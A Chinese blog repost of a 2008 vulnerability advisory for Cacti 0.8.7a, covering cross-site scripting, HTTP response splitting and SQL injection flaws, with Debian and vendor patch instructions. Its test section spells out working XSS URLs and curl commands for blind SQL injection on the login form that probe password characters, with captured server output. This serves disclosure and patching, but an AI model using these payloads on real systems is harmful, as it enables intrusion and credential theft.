Cacti多个输入验证漏洞

最新推荐文章于 2024-05-14 17:34:48 发布
最新推荐文章于 2024-05-14 17:34:48 发布
阅读量156 收藏
点赞数
原文链接:http://blog.51cto.com/liancao/89685
版权
Cacti多个输入验证漏洞

发布日期:2008-02-12

更新日期:2008-07-16



受影响系统:



Raxnet Cacti 0.8.7a



不受影响系统:



Raxnet Cacti 0.8.7b



描述:BUGTRAQ ID: 27749

CVE(CAN) ID: CVE-2008-0786,CVE-2008-0785,CVE-2008-0784,CVE-2008-0783



Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。







Cacti中存在多个输入验证错误,允许远程***者执行HTTP响应拆分、跨站脚本或SQL注入***。







1) 没有正确地过滤对多个参数的输入便用在了SQL查询中,这允许***者执行SQL注入***。







2) 没有正确地过滤对多个参数的输入便返回给了用户,这允许***者向用户浏览器中注入并执行任意HTML和脚本代码,或注入任意HTTP头,而该头会包含在发送给用户的响应中。



<*来源:Francesco Ongaro ( [email]ascii@ush.it[/email]



链接: [url]http://secunia.com/advisories/28872/[/url]

[url]http://marc.info/?l=bugtraq%26amp;m=120284658901282%26amp;w=2[/url]

[url]http://www.debian.org/security/2008/dsa-1569[/url]

*>



测试方法:<font color='#FF0000'><p align='center'>警 告



以下程序(方法)可能带有***性,仅供安全研究与教学之用。使用者风险自负!</p></font> [url]http://www.example.com/cacti/graph.ph[/url] ... 6#39;%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E



[url]http://www.example.com/cacti/graph_vi[/url] ... ouseover=javascript:alert(/XSS/)



[url]http://www.example.com/cacti/index.ph[/url] ... ion=foo/%3Cscript%3Ealert(%26#39;XSS%26#39;)%3C/script%3E



[url]http://www.example.com/cacti/graph_vi[/url] ... 0%26#39;1%26#39;=%26#39;1



[url]http://www.example.com/cacti/tree.php[/url] ... eaf_id=1%20or%201%20=%201















curl " [url]http://www.example.com/cacti/graph_xp[/url] ... hp?local_graph_id=1" -d \



"local_graph_id=1%26#39;" -H "Cookie: Cacti=<cookie value>"







curl " [url]http://www.example.com/cacti/tree.php?action=edit%26amp;id=1[/url]" -d \



"id=sql%26#39;" -H "Cookie: Cacti=<cookie value>"







curl -v " [url]http://www.example.com/cacti/index.php/sql.php[/url]" -d \



"login_username=foo%26#39;+or+ascii(substring(password,1,1))>56#%26amp;action=login"







$ curl -v " [url]http://www.example.com/cacti/index.php/sql.php[/url]" -d \



"login_username=foo%26#39;+or+ascii(substring(password,1,1))<56#%26amp;action=login"



* About to connect() to [url]www.example.com[/url] port 80 (#0)



* Trying 127.0.0.1... connected



* Connected to [url]www.example.com[/url] (127.0.0.1) port 80 (#0)



> POST /cacti-0.8.7a/index.php/sql.php HTTP/1.1



> User-Agent: curl/1.1.1 (i986-gnu-ms-bsd) cacalib/3.6.9 OpenTelnet/0.1



> Host: [url]www.example.com[/url]



> Accept: */*



> Content-Length: 71



> Content-Type: application/x-www-form-urlencoded



>



< HTTP/1.1 200 OK



< Date: Mon, 17 Dec 2007 19:29:34 GMT



< Server: Apache



< X-Powered-By: PHP/1.2.3-linuxz



< Content-Length: 355



< Content-Type: text/html







AAAAAAAAA: SELECT * FROM user_auth WHERE username = %26#39;foo%26#39; or



ascii(substring(password,1,1))<56#%26#39; AND password = md5(%26#39;%26#39;) AND realm=0









Warning: Cannot modify header information - headers already



sent by (output started at /home/x/cacti-0.8.7a/auth_login.php:126)



in /home/x/cacti-0.8.7a/auth_login.php on line 200





* Connection #0 to host [url]www.example.com[/url] left intact



* Closing connection #0







$ curl -kis " [url]http://www.example.com/cacti-0.8.7a/index.php/sql.php[/url]" -d \



"login_username=foo%26#39;+or+ascii(substring(password,1,1))>56#%26amp;action=login" \



| head -n1



HTTP/1.1 200 OK



$ curl -kis " [url]http://www.example.com/cacti-0.8.7a/index.php/sql.php[/url]" -d \



"login_username=foo%26#39;+or+ascii(substring(password,1,1))<56#%26amp;action=login" \



| head -n1



HTTP/1.1 302 Found







<



建议:厂商补丁:



Debian

------

Debian已经为此发布了一个安全公告(DSA-1569-3)以及相应补丁:



DSA-1569-3:New cacti packages fix regression



链接: [url]http://www.debian.org/security/2008/dsa-1569[/url]







补丁下载:







Source archives:







[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i.orig.tar.gz



Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63



[url]http://security.debian.org/pool/updat[/url] ... acti/cacti_0.8.6i-3.5.dsc



Size/MD5 checksum: 581 6184cdfb6a4e7a5372d684556aa46537



[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i-3.5.diff.gz



Size/MD5 checksum: 37154 dc53c27c1584999db93a83be1bf43879







Architecture independent packages:







[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i-3.5_all.deb



Size/MD5 checksum: 958000 f496c887950457535b223bf90988eb72







补丁安装方法:







1. 手工安装补丁包:







首先,使用下面的命令来下载补丁软件:



# wget url (url是补丁下载链接地址)







然后,使用下面的命令来安装补丁:



# dpkg -i file.deb (file是相应的补丁名)







2. 使用apt-get自动安装补丁包:







首先,使用下面的命令更新内部数据库:



# apt-get update







然后,使用下面的命令安装更新软件包:



# apt-get upgrade



Raxnet

------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:







[url]http://www.cacti.net/release_notes_0_8_7b.php[/url]

转载于:https://blog.51cto.com/liancao/89685

weixin_33904756
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cacti命令执行漏洞复现(CVE-2022-46169)
0xSec
02-02 3882
Cacti项目是一个开源平台,可为用户提供强大且可扩展的操作监控和故障管理框架。在1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。漏洞编号:CVE-2022-46169,漏洞等级:严重。
基于CACTI的BGP多路径数据监测分析
03-01
针对BGP缺乏有效的多路径实现的问 题,设计并实现了一个基于CACTI的BGP多路径数据监测分析平台,通过给BGP协议配置多出口鉴别(MED)属性,利用BGP路由表及CACTI流量 监测图,在实验平台上实现了对MED策略路由的验证....
cacti cmd.php,Cacti cmd.php脚本远程SQL注入漏洞
weixin_39901213的博客
04-08 219
<?phpprint_r('--------------------------------------------------------------------------------Cacti <= 0.8.6i "cmd.php" popen() injectionby rgoddork: intitle:"login to cacti"mail: retrog at alic...
严重的Cacti漏洞可导致攻击者执行远程代码
最新发布
smellycat000的专栏
05-14 146
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士广泛使用的网络监控工具 Cacti 最近发布重要安全更新,修复了一系列漏洞,其中最严重的是CVE-2024-25641,CVSS评分为9.1。严重的RCE漏洞CVE-2024-25641可导致拥有“导入模板”权限的认证用户在托管 Cacti 应用的服务器上执行任意PHP代码。该漏洞是因为对函数 import_package() 中所上传的 XML...
Cacti命令执行漏洞分析 (CVE-2022-46169)
whoami
12-07 4021
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。在本漏洞中,攻击者可通过控制由get_nfilter_request_var()函数检索的参数$poller_id,以及构造local_data_ids参数,满足poller_item =POLLER_ACTION_SCRIPT_PHP条件,触发proc_open()函数,从而导致命令执行。Cacti < 1.2.23从漏洞补丁可以看出,本次漏洞点主要存在于lib/functions.php、remote_age
cacti lib/rrd.php rrdtoll 1343,Cacti SQL注入漏洞(CNVD-2015-08486)
weixin_42651748的博客
04-01 249
### 0x01 漏洞简述CactiCacti集团的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。Cacti 0.8.8f以前版本存在SQL注入漏洞。允许远程攻击者通过graphphp属性行动中的rra_id参数执行任意SQL命令。### 0x02 漏洞细节漏洞存在于文件/cacti-0.8.8f/graph....
Cacti 前台命令注入漏洞
SwBack的博客
05-08 988
Cacti是一个服务器监控与管理平台。基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具. 在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。
CACTI-95计费模板
02-21
CACTI-95计费模板,CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-...
cacti监控多个tomcat端口模板xml文件
06-21
所有加载的cacti模板文件中,核心区分点所...以此类推,现在喜欢在一个linux服务器上搭建mysql多实例,那么多实例mysql如何在cacti下监控,也可以用本文中类似的办法构建新的mysql的多端口模板xml文件来重新加载实现。
cacti1.2.16一键脚本
12-01
10. **安全性**:为了保护系统安全,需要定期更新Cacti到最新版本,防止潜在的安全漏洞。同时,应限制对Cacti Web界面的访问,只允许授权用户登录。 总的来说,"Cacti1.2.16一键脚本"简化了监控系统的部署过程,让...
cacti1.2.16 一键安装脚本
03-05
cacti1.2.16 一键安装脚本
CVE-2020-8813:Cacti v1.2.8远程代码执行CVE-2020-8813的官方漏洞利用
03-08
CVE-2020-8813 Cacti v1.2.8远程代码执行CVE-2020-8813的官方漏洞利用 Cacti v1.2.8身份验证前远程执行代码 仙人掌v1.2.8验证后远程执行代码
view.php 漏洞,Cacti graph_view.php SQL注入漏洞
weixin_33498296的博客
03-10 258
存在问题的文件/cacti/graph_view.php:/* ================= input validation ================= */input_validate_input_number(get_request_var_request('branch_id'));input_validate_input_number(get_request_var_req...
cacti graphs new.php,cacti后台SQL注入漏洞 --解决
weixin_33315077的博客
03-27 566
cacti后台SQL注入漏洞简介cacti后台SQL注入漏洞cacti /graphs_new.php中对$_POST["cg_g"]参数过滤不严,导致SQL注入的发生,可能导致敏感数据泄漏。解决方法在第4步1. 漏洞描述other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the ...
cacti graphs new.php,Cacti host_new_graphs_save函数SQL注入漏洞(CVE-2015-8377)
weixin_36057013的博客
03-27 79
Cacti host_new_graphs_save函数SQL注入漏洞(CVE-2015-8377)发布日期:2015-12-15更新日期:2015-12-16受影响系统:Cacti Cacti <= 0.8.8f描述:CVE(CAN) ID: CVE-2015-8377Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。Cacti 0.8.8f及之前...
cacti lib/rrd.php rrdtoll 1343,CVE-2020-8813:Cactiv1.2.8身份验证远程代码执行漏洞分析 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联...
weixin_39526651的博客
04-01 224
0x01 Cacti 介绍Cacti是一个网络图形解决方案,利用RRDTool的数据存储和图形功能,Cacti提供了现成的高级图形模板,多种数据采集方法和用户管理功能。所有这些都封装在一个直观,易于使用的界面中。0x02 漏洞分析通过分析Cacti代码中的多个函数的代码发现了此漏洞,必须将多个因素联系在一起才能执行代码,该漏洞主要发生在攻击者尝试将恶意代码注入“ Cacticookie变量...
cacti后台SQL注入漏洞 --解决
weixin_33755649的博客
03-11 1082
cacti后台SQL注入漏洞 简介 cacti后台SQL注入漏洞 cacti /graphs_new.php中对$_POST["cg_g"]参数过滤不严,导致SQL注入的发生,可能导致敏感数据泄漏。 解决方法在第4步 1. 漏洞描述 other SQL injection vulnerability via graphs_new.php in cact...
实现无密码就能登录Cacti的方法
weixin_33832340的博客
03-05 362
进行一系列设置,不需要密码就能登录Cacti,但前提会有限制,就是登录后不能进行设置,只是一个来宾用户查看一定范围内的信息!步骤如下: 1、进左侧的控制栏 “User Management”再点 “guest”: a、进入后,设guest的密码,如123456,按提示输入两次; b、把“Enabled”前面的复制框打上勾; c、注意“Us...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值